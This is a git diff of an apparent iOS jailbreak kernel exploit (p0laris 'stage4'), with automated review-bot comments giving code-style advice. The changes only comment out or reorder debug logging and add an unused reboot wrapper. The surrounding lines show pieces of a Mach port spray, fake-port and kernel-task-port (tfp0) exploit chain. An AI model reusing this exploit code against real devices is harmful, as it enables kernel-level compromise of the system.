Diffstat (limited to 'src/stage4')
-rwxr-xr-xsrc/stage4/kexp/exploit.js26
-rw-r--r--src/stage4/main.js3
2 files changed, 16 insertions, 13 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 741f217..e761184 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -360,22 +360,22 @@ function r3gister(task, init_port_set, real_count, fake_count) {
}
function mach_ports_lookup_shit() {
- p0laris_log("fuck\n");
+// p0laris_log("fuck\n");
var arrz = shit_heap(4);
- p0laris_log("fuck\n");
+// p0laris_log("fuck\n");
write_u32(arrz, 0);
- p0laris_log("fuck\n");
+// p0laris_log("fuck\n");
var sz = shit_heap(4);;
- p0laris_log("fuck\n");
+// p0laris_log("fuck\n");
write_u32(sz, 3);
- p0laris_log("fuck\n");
+// p0laris_log("fuck\n");
// var mts = mach_task_self();
p0laris_log("fuck\n");
calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
- puts("helo");
- p0laris_log("mpl success\n");
- p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
- p0laris_log("mpl success\n");
+// puts("helo");
+// p0laris_log("mpl success\n");
+// p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+// p0laris_log("mpl success\n");
return read_u32(read_u32(arrz) + 8);
// return 0x42603;
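Review bot: The debug calls are commented out (`+// p0laris_log("fuck\n");`) rather than deleted, while the identical call just above `calls4arg("mach_ports_lookup", ...)` is left active, so the function still logs on every call and the dead lines stay behind to drift; remove them, or gate all of them behind one debug flag, instead of keeping commented-out code. The same comment-out-instead-of-remove pattern is in the next two hunks (`+// p0laris_log("spray_ports %d\n", i);` and `+// p0laris_log("release_port_ptrs %d\n", i);`), where the surrounding `if (i % 4 == 0) { }` is now an empty body that can go too. The context line `var sz = shit_heap(4);;` carries a stray second semicolon. The body of mach_ports_lookup_shit continues past the end of this hunk.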
@@ -460,7 +460,7 @@ again: while (true) {
// for (var i = 0; i < 8; i++) {
var dummy = shit_heap(4);
if (i % 4 == 0) {
- p0laris_log("spray_ports %d\n", i);
+// p0laris_log("spray_ports %d\n", i);
}
write_u32(fp + (i << 2), spray_ports(1));
spray(small_buf, read_u32(small_size), dummy);
@@ -470,7 +470,7 @@ again: while (true) {
for (var i = 0; i < PORTS_NUM; i++) {
// for (var i = 0; i < 8; i++) {
if (i % 4 == 0) {
- p0laris_log("release_port_ptrs %d\n", i);
+// p0laris_log("release_port_ptrs %d\n", i);
}
release_port_ptrs(read_u32(fp + (i << 2)));
}
@@ -487,13 +487,13 @@ again: while (true) {
write_u32(sz, 3);
// mach_ports_lookup_shit_dealloc();
var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+ p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
+ p0laris_log("r3gister done\n");
mach_ports_lookup(mach_task_self(), arrz, sz);
p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
p0laris_log("mpl success\n");
var fake_port = read_u32(read_u32(arrz) + 8);
- p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
- p0laris_log("r3gister done\n");
// while (true) {
//
// }
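Review bot: Moving `p0laris_log("%d %s\n", ret__, mach_error_string(ret__));` ahead of the lookup puts the status in the log before the later reads, but `ret__` is still only logged and never inspected; a one-line comment stating why execution continues regardless of the r3gister status would help the next reader. The sequence that follows (`write_u32(sz, 3);`, the `mach_ports_lookup` call, `read_u32(read_u32(arrz) + 8)`) duplicates what mach_ports_lookup_shit in the first hunk already does, so the two copies are likely to diverge; consider having this site call the helper. The commented-out `// while (true) { }` block at the end is dead text and should be removed. The enclosing `again: while (true)` loop starts before and ends after this hunk.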
diff --git a/src/stage4/main.js b/src/stage4/main.js
index af2ed69..89caddb 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -7,6 +7,7 @@ var listen = scall_wrapper("listen");
var accept = scall_wrapper("accept");
var close = scall_wrapper("close");
var printf = scall_wrapper("printf");
+var reboot = scall_wrapper("reboot");
var AF_INET = 2;
var SOCK_DGRAM = 2;
var SOCK_DGRAM = 2;
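Review bot: `var reboot = scall_wrapper("reboot");` adds a binding whose only use, `// reboot();` in this file's second hunk, is commented out, so the wrapper is resolved at load but never called; drop both lines until the call is actually wired in rather than leaving commented-out code. That second hunk also adds an empty `+` line after the commented call that serves no purpose. The enclosing main() starts before and ends after that hunk.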
@@ -38,6 +39,8 @@ function main() {
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
prep_shit();
+// reboot();
+
var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");